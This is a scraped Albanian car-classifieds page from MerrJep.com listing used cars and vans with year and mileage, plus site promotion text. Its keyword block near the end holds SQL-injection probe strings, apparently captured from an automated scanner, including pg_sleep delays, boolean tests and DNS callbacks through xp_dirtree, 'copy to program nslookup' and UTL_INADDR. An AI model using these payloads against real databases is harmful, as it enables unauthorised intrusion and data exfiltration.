Veturë e vogël
Sedan
Hatchback
Univerzal
Kupe
Kаbriolet
SUV
Minivan

Viti | Makina

Ka shumë shpallje të reja në kategori të ndryshme që regjistrohen çdo ditë në MerrJep.com, pasi ne jemi reklamuesi më i madh në vend. Pavarësisht nëse jeni duke kërkuar me fjalë kyçe,kategori,ose vendndodhje Viti,MerrJep.com është vendi i duhur për ju sepse faqja jonë e internetit ka shumë përdorues dhe shumë shpallje të publikuara në shumë kategori të ndryshme.


Si hapësira më e madhe në internet për shit-blerje, MerrJep ju lejon të blini ose shisni në një mënyrë të thjeshtë dhe të lehtë! Shikoni të gjitha shpalljet bazuar në kërkimin tuaj Shitet Blihet Jepet me qera Kërkohet me qera | Viti ose regjistroni një shpallje tani duke treguar se çfarë është ajo që blini ose shisni dhe përdorni të gjitha avantazhet që vijnë nga të reklamuarit në MerrJep.com.

Sot 13:07 ,

Ww ceddy DSG

Viti: 2009
Kilometrazha: 30 000 - 34 999
Sot 13:07 ,

T5 kamionet 1.9 memklim

Viti: 2005
Kilometrazha: 30 000 - 34 999
Sot 13:07 ,

T5 1.9 me FRIGO

Viti: 2005
Kilometrazha: 25 000 - 29 999
Sot 13:07 ,

Opel vivaro 2007

Viti: 2007
Kilometrazha: 20 000 - 24 999
Sot 13:07 ,

T5 me frigo

Viti: 2006
Kilometrazha: 15 000 - 19 999
Sot 13:07 ,

T6 me FRIGO 2013

Viti: 2013
Kilometrazha: 25 000 - 29 999
Sot 13:07 ,

T5 kamionet 4x4

Viti: 2005
Kilometrazha: 25 000 - 29 999
Sot 12:23 ,

Shitet Pasati

Viti: 1990
Kilometrazha: 25 000 - 29 999
Sot 10:14 ,

GOLF 6 1.6 TDI MODEL TEAM VITI 2012 - I DOGANUAR RKS

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

shes Audi A4 2.0 tdi Automatik me dogan 2012

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

shes bmw 118 2.0 dizell Automatik me dogan 2014

Viti: 2014
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

shes Mercedes c200 2.2 cdi Automatik 11 rks 2010

Viti: 2010
Kilometrazha: 190 000 - 199 999
Sot 09:58 ,

shes skoda 1.2 tdi me dogan te paguar 2011

Viti: 2011
Kilometrazha: 190 000 - 199 999
Sot 09:58 ,

shes opel corsa 1.3 dizell me dogan 2011

Viti: 2011
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

shes bmw 530 3.0 dizell rks 2010

Viti: 2010
Kilometrazha: 250 000 - 299 999
Sot 09:58 ,

shes golf 7 1.6 tdi me dogan te paguar 2015

Viti: 2015
Kilometrazha: 190 000 - 199 999
Sot 09:58 ,

shes bmw 118 2.0 dizell full opsione rks 2012

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

shes Audi A4 2.0 tdi S-line me dogan 2016

Viti: 2016
Kilometrazha: 200 000 - 249 999
Sot 09:58 ,

Opel insignija 1.6 dizell Automatik me dogan 2016

Viti: 2016
Kilometrazha: 140 000 - 149 999
Sot 09:58 ,

shes Golf 7.5 tdi Automatik me dogan facelift 2017

Viti: 2017
Kilometrazha: 130 000 - 139 999
Sot 09:58 ,

shes Mercedes E220 cdi facelift me dogan 2015

Viti: 2015
Kilometrazha: 190 000 - 199 999
Sot 09:58 ,

shes bmw GT 3.0 D xdrive Luxury me dogan 2013

Viti: 2013
Kilometrazha: 170 000 - 179 999
Sot 09:58 Shitorja ,

Blejm Gjitha Modelet e BMW nga viti 2005-2020

30 000 EUR

Viti: 2014
Kilometrazha: 180 000 - 189 999
Sot 08:46 ,

Kombi vito

4 300 EUR

Viti: 2003
Kilometrazha: 35 000 - 39 999
Sot 08:11 ,

Shitet Passat B7 2.0 TDI DSG Automatik 2011 RKS

Viti: 2011
Kilometrazha: 200 000 - 249 999
Sot 08:08 ,

Shitet Golf 7 2.0 TDI R_Line 2013 Manual RKS 02/2023

Viti: 2013
Kilometrazha: 200 000 - 249 999
Sot 08:02 ,

Mercedes GLK 350 CDI 2012 Automatik 4Matic me Dogan t’paguar

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 08:02 ,

BMW 120 D 2.0 Diesel 2005 RKS 10/2022 Manual 6 shpejtsi

Viti: 2005
Kilometrazha: 200 000 - 249 999
Sot 08:01 ,

Shitet Citroen C4 1.6 HDI Manual 2012 vetem meDogan t’paguar

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 07:58 ,

Shitet Opel Meriva 1.7 CDTI Automatik 2012 vetem me Dogan

Viti: 2012
Kilometrazha: 190 000 - 199 999
Sot 07:58 ,

Shitet Golf 6 2.0 TDI R_Line 2012 vetem me Dogan

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 07:58 ,

Shitet Mercedes E 250 CDI 4Matic AMG Automatic 2012 meDogan

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 07:58 ,

Shitet Golf 6 1.6 TDI 4Motion 2012 vetem me Dogan t’paguar

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 07:58 ,

Ford Transit 2.2 Dizel me 6 Ulse 2007 me Dogan t’paguar

Viti: 2007
Kilometrazha: 190 000 - 199 999
Sot 07:58 ,

Shitet Citroen C3 1.4 Dizel viti 2013 Me Dogane

Viti: 2013
Kilometrazha: 120 000 - 129 999
Sot 07:58 ,

Shitet Audi A4 3.0 TDI 2014 Automatik vetem me Dogan

Viti: 2014
Kilometrazha: 200 000 - 249 999
Sot 07:58 ,

Audi A5 2.0 TDI S_Line Automatik 8M 2014 vetem me Dogan

Viti: 2014
Kilometrazha: 190 000 - 199 999
Sot 07:56 ,

Mercedes E 200 2.2 CDI Automatik 2014 vetem meDogan t’paguar

Viti: 2014
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet Mercedes B 180 CDI Automatik 2011 RKS i pare n’KS

Viti: 2011
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet VW Tiguan 2.0 TDI Automatik DSG 4Motion 2013 me Dogan

Viti: 2013
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet Phaeton 3.0 TDI Viti 2011 Long Me Dogane

Viti: 2011
Kilometrazha: 190 000 - 199 999
Sot 07:56 ,

SHKODA Octavia 2.0 TDI 184 PS DSG (4x4) 2015 Dogan Homologim

Viti: 2015
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet Opel Astra 2.0 Dizel Automatik 2015 vetem me Dogan

Viti: 2015
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet Mercedes E 220 CDI 2014 Automatik vetem Dogan Homolog

Viti: 2014
Kilometrazha: 250 000 - 299 999
Sot 07:56 ,

Shitet BMW X6 40 D 2012 Automatik-Steptronic vetem me Dogan

Viti: 2012
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Opel Zafira 1.7 Diesel 2008 7 Ulse RKS deri 03/2023

Viti: 2008
Kilometrazha: 200 000 - 249 999
Sot 07:56 ,

Shitet Seat Leon 1.4 TSI 2011 vetem me Dogan t’paguar

Viti: 2011
Kilometrazha: 170 000 - 179 999

MerrJep.com- Tregu më i madh për shit-blerje në internet!


MerrJep.com plotëson bazën e të dhënave me një numër në rritje të shpalljeve në baza ditore! Shumë individë dhe kompani shesin produktet dhe shërbimet e tyre përmes MerrJep.com.


Numri i lartë i vizitave në faqen e internetit, funksionalitetet e faqes, shërbime të shkëlqyera, mbështetje ndaj klientit, çmime të shkëlqyera dhe oferta speciale për kompanitë, janë vetëm një pjesë e arsyeve pse shumë përdorues në të gjithë vendin dhe jashtë tij, kanë MerrJep si zgjedhjen e tyre të parë për platformë reklamuese për shitjen e produkteve ose shërbimeve të tyre, ose kur kërkojnë të blejnë një lloj produkti ose shërbimi.Këtu mund të gjeni shumë produkte të përdorura, por gjithashtu edhe shumë produkte të reja dhe shumë shërbime të ndryshme.


MerrJep është vendi ideal nëse dëshironi të blini, shisni Vetura, Traktorë, Motoçikleta, Campers, Ekskavatorë, Forkliftë, Banesa, Vila, Parcela ndërtimi, Frigoriferë, Soba elektrike, Ngrohësa, Shporeta druri, Mjete, Materiale Ndërtimi, Laptopë ose nëse dëshironi të gjeni Punë apo shërbime në Përkthime dhe shumë e shumë lloje të tjera shpalljesh.


Pjesë e kompanive që reklamojnë produktet dhe shërbimet e tyre në MerrJep.com janë Agjensioni Holding, PRO REAL ESTATE, Delta Patundshmëri, Meti Patundshmëri, Auto Sallon Erdi, UD Motors, TechPoint, EGS Prishtina, Mobi Shop Raqi, Pet Store Prishtina dhe shumë e shumë biznese të tjera ofrojnë produktet dhe shërbimet e tyre për audiencën e madhe të MerrJep.com.


Më shumë se 1.000.000 shpallje janë duke u prezantuar në MerrJep.com! Këtu, ju mund të gjeni realisht gjithçka! Shitja e veturave, marrja me qira e banesave, shitja e pasurive të patundshme, teknikë të bardhë, kafshë shtëpiake, mekanizim bujqësor, makineri lidhëse, motorë, makina ndërtimi, dyer dhe dritare PVC, instrumente muzikore, veshje dhe shumë gjëra të tjera, po reklamohen në Merrjep.com në baza ditore!


Shitja dhe Blerja në MerrJep.com


Nëse, gjatë kërkimin tuaj | Shitet Blihet Jepet me qera Kërkohet me qera | Viti juve nuk ju shfaqen rezultate të përshtatshme, ju rekomandojmë të regjistroni një shpallje me të cilën do të merrni një ofertë për ato që blini ose shisni. Nëse jeni të interesuar të blini, regjistroni një shpallje me titull "Blej (emri i produktit për të cilin dëshironi të merrni një ofertë)", ose hidhni një vështrim të gjitha shpalljeve aktive sipas interesit tuaj.


Nëse po shisni diçka, regjistroni një shpallje me titull "Në shitje (emri i produktit që jeni duke shitur)", dhe prisni që të kontaktohen nga blerësit potencialisht të interesuar.


Pavarësisht nëse jeni duke shitur apo blerë - MerrJep.com është vendi i duhur për ju!


Me një audiencë që rritet vazhdimisht në baza ditore, MerrJep.com me siguri do t'ju ndihmojë të blini lehtë dhe të shisni në një mënyrë TË LEHTË, TË THJESHTË dhe TË SHPEJTË!


Polo Golf 5 Vetura Mercedes Passat 3c Opel combo Ford Kombi shqiperi Opel vektra bmx Audi 100 1 Ww caddy bmw Mercedes 220 Benzin Golf 3 Pikapa automatik Golf Audi a4 Shes blej Seat cordoba Ford focus mercedez 190 Golf 7 Seat leon SEAT ibiza Gollfe6 toyta Astra Gollf4 Benzin 2005 skoter mercedez dizell 190 Citroen c4 Golf 6 Golf 5 automatik Citroen berlingo kombi mercedes sprinter E bmw 325 dizell 2.5 Opell zafira golf.4 pacifik Pas Korz Tauran automatik 218' -1' OR 2+868-868-1=0+0+0+1 -- -1' OR 3+868-868-1=0+0+0+1 -- -1' OR 3*2<(0+5+868-868) -- -1' OR 3*2>(0+5+868-868) -- -1 OR 2+880-880-1=0+0+0+1 -- -1 OR 3+880-880-1=0+0+0+1 -- -1 OR 3*2<(0+5+880-880) -- -1 OR 3*2>(0+5+880-880) -- -1 OR 2+134-134-1=0+0+0+1 -1 OR 3+134-134-1=0+0+0+1 -1 OR 3*2<(0+5+134-134) -1 OR 3*2>(0+5+134-134) audia4 Autosallon bini Vw elte bmw 325 045513630 mercedes 410 d Pollo 1.4 VW Caddy -1" OR 3*2<(0+5+719-719) -- -1" OR 3+719-719-1=0+0+0+1 -- -1" OR 2+719-719-1=0+0+0+1 -- -1' OR 3*2>(0+5+207-207) or 'caj9CotJ'=' -1' OR 3*2<(0+5+207-207) or 'caj9CotJ'=' -1' OR 3+207-207-1=0+0+0+1 or 'caj9CotJ'=' -1' OR 2+207-207-1=0+0+0+1 or 'caj9CotJ'=' -1' OR 3*2>(0+5+573-573) -- -1' OR 3*2<(0+5+573-573) -- -1' OR 3+573-573-1=0+0+0+1 -- -1' OR 2+573-573-1=0+0+0+1 -- -1 OR 3*2>(0+5+708-708) -1 OR 3*2<(0+5+708-708) -1 OR 3+708-708-1=0+0+0+1 -1 OR 2+708-708-1=0+0+0+1 -1 OR 3*2>(0+5+654-654) -- -1 OR 3*2<(0+5+654-654) -- -1 OR 3+654-654-1=0+0+0+1 -- -1 OR 2+654-654-1=0+0+0+1 -- 286' 1';copy (select '') to program 'nslookup dns.sqli.\013405.15404-110135.15404.a34e1.\1.bxss.me 1;copy (select '') to program 'nslookup dns.sqli.\013405.15404-110132.15404.a34e1.\1.bxss.me' 1');EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110128.15404.a34e1.1.bxss.me\' -- 1';EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110124.15404.a34e1.1.bxss.me\' -- 1;EXEC master..xp_dirtree '\\dns.sqli.013405.15404-110121.15404.a34e1.1.bxss.me\' -- '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110120.15404.a34e1.1.bxss'||'.me')||' 1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.15404-110118.15404.a34e1.1.bxss'||'.me') Te8eV7d5'));select pg_sleep(166); -- BouPXCOn');select pg_sleep(498); -- F5pqkmKe';select pg_sleep(498); -- -1));select pg_sleep(498); -- -1);select pg_sleep(498); --

Në fillim

Uebfaqja jonë përdor Cookies për të përmirësuar eksperiencën tuaj në shfletimin e faqes. Duke klikuar "Unë pajtohem" ose duke vazhduar me përdorimin e uebfaqes, ju pajtoheni me përdorimin e Cookies. Nëse ju nuk pajtoheni, ju mund t'i ndryshoni parametrat e kërkimit në shfletuesin tuaj.

Më shumë informacione